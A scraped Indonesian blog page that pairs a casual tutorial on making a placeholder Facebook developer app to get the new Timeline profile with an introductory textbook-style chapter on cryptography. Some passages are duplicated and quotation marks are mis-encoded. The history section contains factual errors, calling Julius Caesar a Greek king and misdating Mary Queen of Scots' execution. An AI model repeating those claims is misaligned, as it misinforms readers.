Oh iya, tampilan seperti ini untuk sementara juga hanya bisa dilihat oleh sesama developer ja. ;p
jika kalian sudah memiliki aplikasi update status bisa juga membuat hal serupa tanpa membuat lagi aplikasinya
1. https://developers.facebook.com/apps
2. pilih aplikasi yang akan di edit
3. Edit Open Graph (ada disebelah kanan)
4. Setelah terbuka, klik Getting Started dan sekarang masukkan saja sebuah Subject dan Object pada field yang disediakan. Lalu klik mulai
selesai
sekarang tampilan halaman profil facebook anda akan seperti :
selamat mencoba..
kalo ga berhasil jangan salahkan ane ya..
soalnya pas ane cobain bisa kok..kalo pas ente ente ga work, brarti kurang kesabaran dalam mencobanya
keep trying
^_^
n kerjain dengan kesabaran yah.. kalo ga mungkin akan jadi ribet..
nih ane kasih contoh nya FB ane yang dah ane edit.
Tutorial :
mungkin kesan pertama keliatan agak ribet sih, tapi kalo diperhatikan lagi, enak juga tampilan baru ini ^_^. Hanya saja menurut keterangannya, tampilan baru ini untuk sementara hanya dikhususkan untuk para Developer yang memiliki aplikasi di Facebook. Jadi kalo kita juga pengen punya tampilan kayak gini, berarti kita harus jadi developer juga. Yarp, kalo begitu mari kita buat aplikasi agar status kita juga sebagai developer, sehingga bisa menggunakan tampilan terbaru ini. ^_^
https://developers.facebook.com/apps
alamat diatas khusus untuk para developer yang ingin membuat aplikasi via Facebook.
- klik Create New App
- Akan muncul Pop-Up, isikan saja Nama Aplikasi yang kamu sukai :p
- klik Next. Lalu masukkan Captcha
- Setelah masuk ke halaman selanjutnya, edit sedikit informasi tentang aplikasi barumu. Gak usah ribet2, karena aplikasi ini bo'ongan ja. (kan intinya biar kita dianggap developer ;p)
- Klik Open Graph
- Setelah terbuka, sekarang masukkan saja sebuah Subject dan Object pada field yang disediakan. Lihat gambar dibawah ini sebagai contoh:
- Lalu klik Mulai.
Jika sudah, tunggu beberapa menit, lalu buka Halaman Profile kamu, dan akan ada pesan yang meminta kamu untuk Mengupdate Profile sekarang, atau nanti profile akan secara otomatis diupdate pas tanggal 30 September? Karena udah gak sabar pengen lihat hasilnya, so kita pilih Update Sekarang, lalu Halaman Profilemu akan direfresh. Setelah itu.... ta..da.. halaman profile kamu akan tampak berbeda dengan tampilan sebelumnya. ^_^
Silahkan berkreasi dengan gambar dan background disini.
Oh iya, tampilan seperti ini untuk sementara juga hanya bisa dilihat oleh sesama developer ja. ;p
jika kalian sudah memiliki aplikasi update status bisa juga membuat hal serupa tanpa membuat lagi aplikasinya
1. https://developers.facebook.com/apps
2. pilih aplikasi yang akan di edit
3. Edit Open Graph (ada disebelah kanan)
4. Setelah terbuka, klik Getting Started dan sekarang masukkan saja sebuah Subject dan Object pada field yang disediakan. Lalu klik mulai
selesai
sekarang tampilan halaman profil facebook anda akan seperti :
selamat mencoba..
kalo ga berhasil jangan salahkan ane ya..
soalnya pas ane cobain bisa kok..kalo pas ente ente ga work, brarti kurang kesabaran dalam mencobanya
keep trying
^_^
Minggu, 23 Oktober 2011
Pengantar Cryptography
Kehidupan kita saat ini dilingkupi oleh kriptografi. Mulai dari transaksi di mesin ATM,
transaksi di bank, transaksi dengan kartu kredit, percakapan melalui telepon genggam,
mengakses internet, sampai mengaktifkan peluru kendali pun menggunakan kriptografi.
Begitu pentingnya kriptografi untuk keamanan informasi (information security), sehingga
jika berbicara mengenai masalah keamanan yang berkaitan dengan penggunaan komputer,
maka orang tidak bisa memisahkannya dengan kriptografi. kali ini memperkenalkan
kriptografi dan terminologi yang berkaitan dengannya. Dibahas pula mengenai sejarah,
tujuan yang ingin dicapai dengan kriptografi, dan beberapa contoh penggunaan kriptografi.
1.1 Definisi dan Terminologi
Jika anda bertukar pesan (misalnya surat) dengan orang lain, maka anda tentu ingin pesan
yang anda kirim sampai ke pihak yang dituju dengan aman. Pengertian aman di sini sangat
luas. Aman bisa berarti bahwa selama pengiriman pesan tentu anda berharap pesan tersebut
tidak dibaca oleh orang yang tidak berhak. Sebab, mungkin saja pesan yang anda kirim
berisi sesuatu yang rahasia sehingga jika pesan rahasia dibaca oleh pihak lawan atau pihak
yang tidak berkepentingan, maka bocorlah kerahasiaan pesan yang anda kirim. Ini adalah
masalah keamanan pesan yang dinamakan kerahasiaan (confidentiality atau privacy).
Aman bisa juga berarti bahwa anda ingin pesan yang dikirim sampai dengan utuh ke
tangan penerima, artinya isi pesan tidak diubah atau dimanipulasi selama pengiriman oleh
pihak ketiga. Di sisi penerima pesan, ia tentu ingin memastikan bahwa pesan yang ia
terima adalah pesan yang masih asli, bukan pesan yang sudah ditambah-tambah atau
dikurangi. Ini adalah masalah keamanan pesan yang disebut integritas data (data
integrity). Selain itu, penerima yakin bahwa pesan tersebut memang benar berasal dari
anda, bukan dari orang lain yang menyamar seperti anda, dan anda pun yakin bahwa orang
yang anda kirimi pesan adalah orang yang sesungguhnya. Ini adalah masalah keamanan
pesan yang dinamakan otentikasi (auhentication).
Jika anda sebagai penerima pesan, anda pun tidak ingin kelak pengirim pesan membantah
pernah mengirim pesan kepada anda. Ini adalah masalah keamanan yang disebut
penyangkalan (repudiaton). Zaman sekarang banyak orang yang membantah telah
mengirim atau menerima pesan. Padahal anda yakin bahwa anda memang menerima pesan
dari orang tersebut. Jika pengirim membantah telah mengirim pesan, maka anda perlu
membuktikan ketidakbenaran penyangkalan tersebut (non-repudiation).
Keempat masalah keamanan yang disebutkan di atas, yaitu kerahasiaan, integritas data,
otentikasi, dan penyangkalan dapat diselesaikan dengan menggunakan kriptografi.
Kriptografi tidak hanya menyediakan alat untuk keamanan pesan, tetapi juga sekumpulan
teknik yang berguna.
Kriptografi (cryptography) berasal dari Bahasa Yunani: “cryptós†artinya “secretâ€
(rahasia), sedangkan “gráphein†artinya “writing†(tulisan). Jadi, kriptografi berarti “secret
writing†(tulisan rahasia). Ada beberapa definisi kriptografi yang telah dikemukakan di
dalam berbagai literatur. Definisi yang dipakai di dalam buku-buku yang lama (sebelum
tahun 1980-an) menyatakan bahwa kriptografi adalah ilmu dan seni untuk menjaga
kerahasian pesan dengan cara menyandikannya ke dalam bentuk yang tidak dapat
dimengerti lagi maknanya. Definisi ini mungkin cocok pada masa lalu di mana kriptografi
digunakan untuk keamanan komunikasi penting seperti komunikasi di kalangan militer,
diplomat, dan mata-mata. Namun saat ini kriptografi lebih dari sekadar privacy, tetapi juga
untuk tujuan data integrity, authentication, dan non-repudiation.
Definisi yang kita pakai di dalam buku ini mengutip definisi yang dikemukakan di dalam
[SCH96]:
Kriptografi adalah ilmu dan seni untuk menjaga keamanan pesan
(Cryptography is the art and science of keeping messages secure)
Sebagai pembanding, selain definisi tersebut di atas, terdapat pula definisi yang
dikemukakan di dalam [MEN96]:
Kriptografi adalah ilmu yang mempelajari teknik-teknik matematika yang
berhubungan dengan aspek keamanan informasi seperti kerahasiaan, integritas
data, serta otentikasi
Kata “seni†di dalam definisi di atas berasal dari fakta sejarah bahwa pada masa-masa awal
sejarah kriptografi, setiap orang mungkin mempunyai cara yang unik untuk merahasiakan
pesan. Cara-cara unik tersebut mungkin berbeda-beda pada setiap pelaku kriptografi
sehingga setiap cara menulis pesan rahasia pesan mempunyai nilai estetika tersendiri
sehingga kriptografi berkembang menjadi sebuah seni merahasiakan pesan (kata “graphyâ€
di dalam “cryptography†itu sendiri sudah menyiratkan sebuah seni).
sehingga anda dapat mamahami bahwa kriptografi dapat dipandang sebagai sebuah seni
merahasiakan pesan. Pada perkembangan selanjutnya, kriptografi berkembang menjadi
sebuah disiplin ilmu sendiri karena teknik-teknik kriptografi dapat diformulasikan secara
matematik sehingga menjadi sebuah metode yang formal.
Terminologi
Di dalam kriptografi kita akan sering menemukan berbagai istilah atau terminologi.
Beberapa istilah yang penting untuk diketahui diberikan di bawah ini.
(a) Pesan, Plainteks, dan Cipherteks
Pesan (message) adalah data atau informasi yang dapat dibaca dan dimengerti
maknanya. Nama lain untuk pesan adalah plainteks (plaintext) atau teks-jelas
(cleartext). Pesan dapat berupa data atau informasi yang dikirim (melalui kurir, saluran
telekomunikasi, dsb) atau yang disimpan di dalam media perekaman (kertas, storage,
dsb). Pesan yang tersimpan tidak hanya berupa teks, tetapi juga dapat berbentuk citra
(image), suara/bunyi (audio), dan video, atau berkas biner lainnya.
Agar pesan tidak dapat dimengerti maknanya oleh pihak lain, maka pesan perlu
disandikan ke bentuk lain yang tidak dapat dipahami. Bentuk pesan yang tersandi
disebut cipherteks (ciphertext) atau kriptogram (cryptogram). Cipherteks harus dapat
ditransformasikan kembali menjadi plainteks semula agar pesan yang diterima bisa
dibaca. masingmasing berupa teks dan gambar, serta cipherteks yang berkoresponden. Perhatikan
bahwa plainteks dapat dibaca dengan jelas, tetapi cipherteks sudah tidak dapat lagi
dimengerti maknanya. Melalui proses yang berkebalikan, cipherteks dapat
ditransformasikan kembali menjadi plainteks semula.
(b) Pengirim dan penerima
Komunikasi data melibatkan pertukaran pesan antara dua entitas. Pengirim (sender)
adalah entitas yang mengirim pesan kepada entitas lainnya. Penerima (receiver)
adalah entitas yang menerima pesan. Entitas di sini dapat berupa orang, mesin
(komputer), kartu kredit, dan sebagainya. Jadi, orang bisa bertukar pesan dengan orang
lainnya (contoh: Alice berkomunikasi dengan Bob), sedangkan di dalam jaringan
komputer mesin (komputer) berkomunikasi dengan mesin (contoh: mesin ATM
berkomunikasi dengan komputer server di bank).
Pengirim tentu menginginkan pesan dapat dikirim secara aman, yaitu ia yakin bahwa
pihak lain tidak dapat membaca isi pesan yang ia kirim. Solusinya adalah dengan cara
menyandikan pesan menjadi cipherteks.
© Enkripsi dan dekripsi
Proses menyandikan plainteks menjadi cipherteks disebut enkripsi (encryption) atau
enciphering (standard nama menurut ISO 7498-2). Sedangkan proses mengembalikan
cipherteks menjadi plainteks semula dinamakan dekripsi (decryption) atau
deciphering (standard nama menurut ISO 7498-2). Enkripsi dan dekripsi dapat
diterapkan baika pada pesan yang dikirim maupun pada pesan tersimpan. Istilah
encryption of data in motion mengacu pada enkripsi pesan yang ditransmisikan
melalui saluran komunikasi, sedangkan istilah enrypton of data at-rest mengacu pada
enkripsi dokumen yang disimpan di dalam storage. Contoh encryption of data in
motion adalah pengiriman nomor PIN dari mesin ATM ke komputer server di kantor
bank pusat. Contoh encryption of data at-rest adalah enkripsi file basis data di dalam
hard disk.
(d) Cipher dan kunci
Algoritma kriptografi disebut juga cipher yaitu aturan untuk enchipering dan
dechipering, atau fungsi matematika yang digunakan untuk enkripsi dan dekripsi.
Beberapa cipher memerlukan algoritma yang berbeda untuk enciphering dan
deciphering.
Konsep matematis yang mendasari algoritma kriptografi adalah relasi antara dua buah
himpunan yaitu himpunan yang berisi elemen-elemen plainteks dan himpunan yang
berisi cipherteks. Enkripsi dan dekripsi merupakan fungsi yang memetakan elemenelemen
antara kedua himpunan tersebut. Misalkan P menyatakan plainteks dan dan C
menyatakan chiperteks, maka fungsi enkripsi E memetakan P ke C,
E(P) = C
Dan fungsi dekripsi D memetakan C ke P,
D© = P
Karena proses enkripsi kemudian dekripsi mengembalikan pesan ke pesan asal, maka
kesamaan berikut harus benar,
D(E(P)) = P
Keamanan algoritma sering kriptografi diukur dari banyaknya kerja (work) yang
dibutuhkan untuk memecahkan chiperteks menjadi plainteksnya tanpa mengetahui
kunci yang digunakan. Kerja ini dapat diekivalenkan dengan waktu, memori, uang,
dan lain-lain. Semakin banyak kerja yang diperlukan, yang berarti juga semakin lama
waktu yang dibutuhkan, maka semakin kuat algoritma kriptografi tersebut, yang
berarti semakin aman digunakan untuk menyandikan pesan.
Jika keamanan kriptografi ditentukan dengan menjaga kerahasiaan algoritmanya, maka
algoritma kriptografinya dinamakan algoritma restricted. Algoritma restricted
mempunyai sejarah tersendiri di dalam kriptografi. Algoritma restricted biasanya
digunakan oleh sekelompok orang untuk bertukar pesan satu sama lain. Mereka
membuat suatu algoritma enkripsi dan algoritma enkripsi tersebut hanya diketahui oleh
anggota kelompok itu saja. Tetapi, algoritma restricted tidak cocok lagi saat ini, sebab
setiap kali ada anggota kelompok keluar, maka algoritma kriptografi harus diganti lagi.
Kriptografi modern mengatasi masalah di atas dengan penggunaan kunci, yang dalam
hal ini algoritma tidak lagi dirahasiakan, tetapi kunci harus dijaga kerahasiaannya.
Kunci (key) adalah parameter yang digunakan untuk transformasi enciphering dan
dechipering. Kunci biasanya berupa string atau deretan bilangan. Dengan
menggunakan kunci K, maka fungsi enkripsi dan dekripsi dapat ditulis sebagai
EK(P) = C dan DK© = P
dan kedua fungsi ini memenuhi
DK(EK(P)) = P
Istilah “cipher†sering disamakan dengan kode (code). Kode mempunyai sejarah
tersendiri di dalam kriptografi. Sebenarnya kedua istilah ini tidak sama pengertiannya.
Jika cipher adalah transformasi karakter-ke-karakter atau bit-ke-bit tanpa
memperhatikan struktur bahasa pesan, maka kode sering diacu sebagai prosedur yang
mengganti setiap plainteks dengan kata kode, misalnya
kapal api datang dikodekan menjadi hutan bakau hancur
Kode juga dapat berupa deretan angka dan huruf yang tidak bermakna, seperti
kapal api datang dikodekan menjadi xyztvq bkugbf hjqpot
Transformasi dari plainteks menjadi kode sering disebut encoding, sedangkan
transformasi kebalikannya sering disebut decoding. Di dalam kriptografi, buku kode
(codebook) – . Buku kode terdiri dari tabel lookup (lookup
table) untuk encoding dan decoding. Untuk melakukan enkripsi dan dekripsi pesan,
buku kode yang sama harus tersedia di sisi pengirim dan penerima pesan. Penyebaran
buku kode menimbulkan masalah tersendiri menyangkut keamanannya, sehingga
penggunaan kode di dalam kriptografi tidak mempunyai umur yang panjang dan
cipher menjadi teknik yang dominan. Pihak lawan yang mencoba mentransformasikan
kode menajdi plainteks dinamakan pemecah kode (codebreaker).
(e) Sistem Kriptografi
Kriptografi membentuk sebuah sistem yang dinamakan sistem kriptografi. Sistem
kriptografi (cryptosystem) adalah kumpulan yang terdiri dari algoritma kriptografi,
semua plainteks dan cipherteks yang mungkin, dan kunci [SCH96]. Di dalam sistem
kriptografi, cipher hanyalah salah satu komponen saja.
(g) Penyadap
Penyadap (eavesdropper) adalah orang yang mencoba menangkap pesan selama
ditransmisikan. Tujuan penyadap adalah untuk mendapatkan informasi sebanyakbanyaknya
mengenai sistem kriptografi yang digunakan untuk berkomunikasi dengan
maksud untuk memecahkan cipherteks. Nama lain penyadap: enemy, adversary,
intruder, interceptor, bad guy. Ron Rivest, seorang pakar kriptografi, menyatakan
bahwa cryptography is about communication in the presence of adversaries
(Kriptografi adalah perihal berkomunikasi dengan keberadaan pihak musuh) [WIK06].
(f) Kriptanalisis dan kriptologi
Kriptografi berkembang sedemikian rupa sehingga melahirkan bidang yang
berlawanan yaitu kriptanalisis. Kriptanalisis (cryptanalysis) adalah ilmu dan seni
untuk memecahkan chiperteks menjadi plainteks tanpa mengetahui kunci yang
digunakan. Pelakunya disebut kriptanalis. Jika seorang kriptografer (cryptographer)
mentransformasikan plainteks menjadi cipherteks dengan suatu algoritma dan kunci
maka sebaliknya seorang kriptanalis berusaha untuk memecahkan cipherteks tersebut
untuk menemukan plainteks atau kunci. Kriptologi (cryptology) adalah studi
mengenai kriptografi dan kriptanalisis. Baik kriptografi maupun kriptanalisis keduanya
saling berkaitan.
Sebagian para parktisi sering menggunakan istilah kriptografi dan kriptologi secara
bergantian, sebagian lagi membedakan bahwa kriptografi mengacu pada penggunaan
praktis teknik-tekink kriptografi, sedangkan kriptologi mengacu pada subjek sebagai
bidang studi (seperti halnya biologi, geologi, antropologi, dan sebagainya) [WIK06].
1.2 Tujuan Kriptografi
Dari paparan awal di dalam upabab 1.1, kita dapat merangkum bahwa kriptografi bertujuan
untuk memberi layanan keamanan (yang juga dinamakan sebagai aspek-aspek keamanan)
sebagai berikut [SCH96][MEN96][WIK06]:
1. Kerahasiaan (confidentiality), adalah layanan yang ditujukan untuk menjaga agar
pesan tidak dapat dibaca oleh pihak-pihak yang tidak berhak. Di dalam kriptografi,
layanan ini direalisasikan dengan menyandikan pesan menjadi cipherteks. Misalnya
pesan “Harap datang pukul 8†disandikan menjadi “TrxC#45motyptre!%â€. Istilah lain
yang senada dengan confidentiality adalah secrecy dan privacy. Lebih jauh mengenai
metode penyandian akan dibahas di dalam bab-bab selanjutnya.
2. Integritas data (data integrity), adalah layanan yang menjamin bahwa pesan masih
asli/utuh atau belum pernah dimanipulasi selama pengiriman. Dengan kata lain, aspek
keamanan ini dapat diungkapkan sebagai pertanyaan: “Apakah pesan yang diterima
masih asli atau tidak mengalami perubahan (modifikasi)?â€. Untuk menjaga integritas
data, sistem harus memiliki kemampuan untuk mendeteksi manipulasi pesan oleh
pihak-pihak yang tidak berhak, antara lain penyisipan, penghapusan, dan
pensubsitusian data lain kedalam pesan yang sebenarnya. Di dalam kriptografi,
layanan ini direalisasikan dengan menggunakan tanda-tangan digital (digital
signature). Pesan yang telah ditandatangani menyiratkan bahwa pesan yang dikirim
adalah asli. Lebih jauh mengenai tanda-tangan digital akan dibahas di dalam Bab
Tanda-tangan Digital.
3. Otentikasi (authentication), adalah layanan yang berhubungan dengan identifikasi,
baik mengidentifikasi kebenaran pihak-pihak yang berkomunikasi (user authentication
atau entity authentication) maupun mengidentifikasi kebenaran sumber pesan (data
origin authentication). Dua pihak yang saling berkomunikasi harus dapat
mengotentikasi satu sama lain sehingga ia dapat memastikan sumber pesan. Pesan
yang dikirim melalui saluran komunikasi juga harus diotentikasi asalnya. Dengan kata
lain, aspek keamanan ini dapat diungkapkan sebagai pertanyaan: “Apakah pesan yang
diterima benar-benar berasal dari pengirim yang benar?â€. Otentikasi sumber pesan
secara implisit juga memberikan kepastian integritas data, sebab jika pesan telah
dimodifikasi berarti sumber pesan sudah tidak benar. Oleh karena itu, layanan
integritas data selalu dikombinasikan dengan layanan otentikasi umber pesan. Di
dalam kriptografi, layanan ini direalisasikan dengan menggunakan tanda-tangan digital
(digital signature). Tanda-tangan digital menyatakan sumber pesan.
4. Nirpenyangkalan (non-repudiation), adalah layanan untuk mencegah entitas yang
berkomunikasi melakukan penyangkalan, yaitu pengirim pesan menyangkal
melakukan pengiriman atau penerima pesan menyangkal telah menerima pesan. Sebagai
contoh misalkan pengirim pesan memberi otoritas kepada penerima pesan untuk
melakukan pembelian, namun kemudian ia menyangkal telah memberikan otoritas
tersebut. Contoh lainnya, misalkan seorang pemilik emas mengajukan tawaran
kepada toko mas bahwa ia akan menjual emasnya. Tetapi, tiba-tiba harga emas turun
drastis, lalu ia membantah telah mengajukan tawaran menjual emas. Dalam hal ini,
pihak toko emas perlu prosedur nirpenyangkalan untuk membuktikan bahwa pemilik
emas telah melakukan kebohongan.
Kriptografi mempunyai sejarah yang panjang. Informasi yang lengkap mengenai sejarah
kriptografi dapat ditemukan di dalam buku David Kahn yang berjudul The Codebreakers.
Buku yang tebalnya 1000 halaman ini menulis secara rinci sejarah kriptografi mulai dari
penggunaan kriptografi oleh Bangsa Mesir 4000 tahun yang lalu (berupa hieroglyph yang
tidak standard pada priamid) hingga penggunaan kriptografi pada abad ke-20. Secara
historis ada empat kelompok orang yang berkontribusi terhadap perkembangan kriptografi,
dimana mereka menggunakan kriptografi untuk menjamin kerahasiaan dalam komunikasi
pesan penting, yaitu kalangan militer (termasuk intelijen dan mata-mata), kalangan
diplomatik, penulis buku harian, dan pencinta (lovers). Di antara keempat kelompok ini,
kalangan militer yang memberikan kontribusi paling penting penting karena pengiriman
pesan di dalam suasana perang membutuhkan teknik enkripsi dan dekripsi yang rumit.
Sejarah kriptografi sebagian besar merupakan sejarah kriptografi klasik, yaitu metode
enkripsi yang menggunakan kertas dan pensil atau mungkin dengan bantuan alat mekanik
sederhana. Secara umum algoritma kriptografi klasik dikelompokkan menjadi dua kategori,
yaitu algoritma transposisi (transposition cipher) dan algoritma substitusi (substitution
cipher). Cipher transposisi mengubah susunan huruf-huruf di dalam pesan, sedangkan
cipher substitusi mengganti setiap huruf atau kelompok huruf dengan sebuah huruf atau
kelompok huruf lain. Sejarah kriptografi klasik mencatat penggunaan cipher transposisi
oleh tentara Sparta di Yunani pada permulaan tahun 400 SM. Mereka menggunakan alat
yang namanya scytale (Gambar 1.6(a)). Scytale terdiri dari sebuah kertas panjang dari
daun papyrus yang dililitkan pada sebuah silinder dari diameter tertentu (diameter silender
menyatakan kunci penyandian). Pesan ditulis secara horizontal, baris per baris (lihat
Gambar 1.6(b)). Bila pita dilepaskan, maka huruf-huruf di dalamnya telah tersusun secara
acak membentuk pesan rahasia. Untuk membaca pesan, penerima pesan harus melilitkan
kembali melilitkan kembali kertas tersebut ke silinder yang diameternya sama dengan
diameter silinder pengirim. Sedangkang algoritma substitusi paling awal dan paling
sederhana adalah Caesar cipher, yang digunakan oleh raja Yunani kuno, Julius Caesar.
Caranya adalah dengan mengganti setiap karakter di dalam alfabet dengan karakter yang
terletak pada tiga posisi berikutnya di dalam susunan alfabet.
Kriptografi juga digunakan untuk tujuan keamanan. Kalangan gereja pada masa awal
agama Kristen menggunakan kriptografi untuk menjaga tulisan relijius dari gangguan
otoritas politik atau budaya yang dominan saat itu. Mungkin yang sangat terkenal adalah
“Angka si Buruk Rupa (Number of the Beast) di dalam Kitab Perjanjian Baru. Angka
“666†menyatakan cara kriptografik (yaitu dienkripsi) untuk menyembunyikan pesan
berbahaya; para ahli percaya bahwa pesan tersebut mengacu pada Kerajaan Romawi
[WIK06].
Di India, kriptografi digunakan oleh pencinta (lovers) untuk berkomunikasi tanpa diketahui
orang. Bukti ini ditemukan di dalam buku Kama Sutra yang merekomendasikan wanita
seharusnya mempelajari seni memahami tulisan dengan cipher.
Pada Abad ke-17, sejarah kriptografi mencatat korban ketika ratu Skotlandia, Queen Mary,
dipancung setelah surat rahasianya dari balik penjara (surat terenkrpsi yang isinya rencana
membunuh Ratu Elizabeth I) berhasil dipecahkan oleh seorang pemecah kode.
Seperti yang telah disebutkan di atas bahwa kriptografi umum digunakan di kalangan
militer. Pada Perang Dunia ke II, Pemerintah Nazi Jerman membuat mesin enkripsi yang
dinamakan Enigma. (Gambar 1.7). Mesin yang menggunakan beberapa buah rotor (roda
berputar) ini melakukan enkripsi dengan cara yang sangat rumit. Namun Enigma cipher
berhasil dipecahkan oleh pihak Sekutu dan keberhasilan memecahkan Enigma sering
dikatakan sebagai faktor yang memperpendek perang dunia ke-2.
Kriptografi modern dipicu oleh perkembangan peralatan komputer digital. Dengan
komputer digital, cipher yang lebih kompleks menjadi sangat mungkin untuk dapat
dihasilkan. Tidak seperti kriptografi klasik yang mengenkripsi karakter per karakter
(dengan menggunakan alfabet tradisionil), kriptografi modern beroperasi pada string biner.
Cipher yang kompleks seperti DES (Data Encryption Standard) dan penemuan algoritma
RSA adalah algoritma kriptografi modern yang paling dikenal di dalam sejarah kriptografi
modern. Kriptografi modern tidak hanya berkaitan dengan teknik menjaga kerahasiaan
pesan, tetapi juga melahirkan konsep seperti tanda-tangan digital dan sertifikat digital.
Dengan kata lain, kriptografi modern tidak hanya memberikan aspek keamanan
confidentiality, tetapi juga aspek keamanan lain seperti otentikasi, integritas data, dan
nirpenyangkalan sebagaimana sudah dijelaskan di dalam upa-bab 1.2.
1.4 Kriptanalisis
Sejarah kriptografi paralel dengan sejarah kriptanalisis (cryptanalysis) , yaitu bidang ilmu
dan seni untuk memecahkan cipherteks. Kata “kriptanalisis†sendiri relatif masih baru
(pertama kali diungkapkan oleh William Friedman pada tahun 1920), namun sebenarnya
teknik kriptanalisis sudah ada sejak abad ke-9. Adalah seorang ilmuwan Arab pada Abad
IX bernama Abu Yusuf Yaqub Ibnu Ishaq Ibnu As-Sabbah Ibnu 'Omran Ibnu Ismail Al-
Kindi, atau yang lebih dikenal sebagai Al-Kindi yang menulis buku tentang seni
memecahkan kode. Dalam buku yang berjudul ‘Risalah fi Istikhraj al-Mu'amma
(Manuscript for the Deciphering Cryptographic Messages), ia menuliskan naskah untuk
menguraikan kode-kode rahasia (Gambar 1.8). Di dalam buku tersebut Al-Kindi
memperkenalkan teknik penguraian kode atau atau sandi yang sulit dipecahkan. Ia juga
mengklasifikasikan sandi rahasia itu serta menjelaskan ilmu fonetik Arab dan sintaksisnya.
Yang paling penting lagi, dalam bukunya ini ia mengenalkan penggunaan beberapa teknik
statistika untuk memecahkan kode-kode rahasia (dikutip dari Republika online, 16 Juni
2006).
Apa yang dilakukan oleh Al-Kindi didalam kriptanalisis dikenal dengan nama teknik
analisis frekuensi, yaitu teknik untuk memecahkan cipherteks berdasarkan frekuensi
kemunculan karakter di dalam pesan dan kaitannya dengan frekuensi kemunculan karakter
di dalam alfabet. Analisis frekuensi dilatarbelakangi oleh fakta bahwa cipher gagal
menyembunyikan statistik kemunculan karakter di dalam cipherteksnya. Misalnya, di
dalam Bahasa Inggris huruf “E†adalah huruf paling sering muncul di dalam kalimatkalimat
berbahas Inggris. Jika di dalam cipherteks terdapat huruf yang paling sering
muncul, maka kemungkinan besar huruf tersebut di dalam plainteksnya adalah huruf E
(teknik ini akan dijleaskan di dalam Bab 4). Berbagai cipher klasik berhasil dipecahkan
dengan teknik analisis frekuensi ini.
Teknik analisis frekuensi masih digunakan di dalam kriptanalisis modern, tetapi karena
cipher semakin rumit, maka pendekatan matematik masih tetap dominan dalam melakukan
kriptanalisis. Perkembangan komputer pun ikut membantu kegiatan kriptanilisis. Sejarah
kriptanalissi mencatat hasil gemilang seperti pemecahan Telegram Zimmermann yang
membawa Amerika Serikat ke kancah Perang Dunia I, dan pemecahan cipherteks dari
mesin Enigma ikut andil mengakhiri Perang Dunia II
1.5 Kriptografi Kunci-Simetri dan Nirsimetri
Selain berdasarkan sejarah yang membagi kriptografi menjadi kriptografi klasik dan
kriptografi modern, maka berdasarkan kunci yang digunakan untuk enkripsi dan dekripsi,
kriptografi dapat dibedakan lagi menjadi kriptografi kunci-simetri (symmetric-key
cryptography) dan kriptografi kunci-nirsimetri (asymmetric-key cryptography).
Pada sistem kriptografi kunci-simetri, kunci untuk enkripsi sama dengan kunci untuk
dekripsi, oleh karena itulah dinamakan kriptografi simetri. Istilah lain untuk
kriptografi kunci-simetri adalah kriptografi kunci privat (private-key cryptography),
kriptografi kunci rahasia (secret-key cryptography), atau kriptografi konvensional
(conventional cryptography). Sistem kriptografi kunci-simetri (atau disingkat menjadi
“kriptografi simetri†saja), mengasumsikan pengirim dan penerima pesan sudah berbagi
kunci yang sama sebelum bertukar pesan. Keamanan sistem kriptografi simetri terletak
pada kerahasiaan kuncinya. Kriptografi simetri merupakan satu-satunya jenis kriptografi
yang dikenal dalam catatan sejarah hingga tahun 1976. Semua algoritma kriptografi klasik
termasuk ke dalam sistem kriptografi simetri. Di sisi lain, ada puluhan algoritma
kriptografi modern yang termasuk ke dalam sistem kriptografi simetri, diantaranya adalah
DES (Data Encryption Standard), Blowfish, Twofish, Triple-DES, IDEA, Serpent, dan yang
terbaru adalah AES (Advanced Encryption Standard).
Secara umum, cipher yang termasuk ke dalam kriptografi simetri beroperasi dalam mode
blok (block cipher), yaitu setiap kali enkripsi/dekripsi dilakukan terhadap satu blok data
(yang berukuran tertentu), atau beroperasi dalam mode aliran (stream cipher), yaitu setiap
kali enkripsi/dekripsi dilakukan terhadap satu bit atau satu byte data. Aplikasi kriptografi
simetri yang utama adalah adalah melindungi kerahasiaan data yang dikirim melalui
saluran tidak aman dan melindungi kerahasiaan data yang disimpan pada media yang tidak
aman. Kelemahan dari sistem ini adalah baik pengirim maupun penerima pesan harus
memiliki kunci yang sama, sehingga pengirim pesan harus mencari cara yang aman untuk
memberitahukan kunci kepada penerima pesan.
Jika kunci untuk enkripsi tidak sama dengan kunci untuk dekripsi, maka kriptografinya
dinamakan sistem kriptografi nirsimetri. Nama lainnya adalah kriptogarfi kunci-publik
(public-key cryptography), sebab kunci untuk enkripsi tidak rahasia dan dapat diketahui
oleh siapapun (diumumkan ke publik), sementara kunci untuk dekripsi hanya diketahui
oleh penerima pesan (karena itu rahasia). Pada kriptografi jenis ini, setiap orang yang
berkomunikasi mempunyai sepasang kunci, yaitu kunci privat dan kunci publik. Pengirim
mengenkripsi pesan dengan menggunakan kunci publik si penerima pesan (receiver).
Hanya penerima pesan yang dapat mendekripsi pesan karena hanya ia yang mengetahui
kunci privatnya sendiri (Gambar 1.10). Contoh algoritma kriptografi kunci-publik
diantaranya RSA, Elgamal, DSA, dan sebagainya.
Kriptografi kunci-publik dapat dapat dianalogikan seperti kotak surat yang terkunci dan
memiliki lubang untuk memasukkan surat. Setiap orang dapat memasukkan surat ke dalam
kotak surat tersebut, tetapi hanya pemilik kotak yang dapat membuka kotak dan membaca
surat di dalamnya karena ia yang memiliki kunci. Keuntungan sistem ini ada dua. Pertama,
tidak ada kebutuhan untuk mendistribusikan kunci privat sebagaimana pada sistem
kriptografi simetri. Kunci publik dapat dikirim ke penerima melalui saluran yang sama
dengan saluran yang digunakan untuk mengirim pesan. Saluran untuk mengirim pesan
umumnya tidak aman.
Kedua, jumlah kunci dapat ditekan. Untuk berkomunikasi secara rahasia dengan banyak
orang tidak perlu kunci rahasia sebanyak jumlah orang tersebut, cukup membuat dua buah
kunci, yaitu kunci publik bagi para koresponden untuk mengenkripsi pesan, dan kunci
privat untuk mendekripsi pesan. Berbeda dengan kriptografi kunci-simetris dimana jumlah
kunci yang dibuat adalah sebanyak jumlah pihak yang diajak berkorespondensi. Contoh
penggunaan, misalkan jaringan komputer menghubungkan komputer karyawan di kantor
cabang dengan komputer menejer di kantor pusat. Seluruh kepala cabang diberitahu bahwa
kalau mereka mengirim laporan ke menejer di kantor pusat, mereka harus mengenkripsi
laporan tersebut dengan kunci publik menejer (kunci publik menejer diumumkan kepada
seluruh kepala cabang). Untuk mengembalikan laporan tersandi ke laporan semula, hanya
menejer yang dapat melakukan dekripsi, karena hanya dialah yang memegang kunci privat.
Selama proses transmisi cipherteks dari kantor cabang ke kantor pusat melalui saluran
